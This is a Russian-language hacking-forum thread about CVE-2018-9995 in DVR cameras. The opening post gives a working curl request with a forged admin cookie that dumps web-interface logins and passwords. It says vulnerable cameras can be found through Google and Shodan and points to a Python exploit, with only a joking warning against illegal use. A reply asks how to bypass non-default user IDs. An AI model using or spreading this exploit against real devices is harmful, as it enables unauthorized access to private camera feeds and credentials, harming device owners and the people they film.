• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь. Мобильный клиент для IOS находится в itunes по этой ссылке

Статья CVE-2018-9995 или как получить логин и пароль к DVR камере

Dr.Lafa

Mod. Hardware
Gold Team
30.12.2016
440
833
#1
Приветствую, форумчане. Не так давно была обнаружена уязвимость, затрагивающая довольно большое количество камер.
Брешь позволяет одним запросом вытащить логины и пароли к веб интерфейсу DVR устройства, откуда, кстати, можно смотреть трансляцию/запись камеры, менять настройки и всё в этом духе.

Собственно запрос
Код:
curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
1525374909606.png

Камеры неплохо "гуглятся" и находятся в шодане.
1525374164240.png

1525374381482.png

Не советую использовать всё это дело в незаконных целях (я должен был это сказать), по крайней мере потому, что подглядывать не хорошо;)
На гите автора есть эксплоит на питоне (хотя по мне проще написать свой)
 

OBLIVIONNN

Well-known member
22.08.2017
141
85
#6
Я так понимаю uid это логин, но как тогда узнать uid если он по стандарту не admin ?
 
Вверх Снизу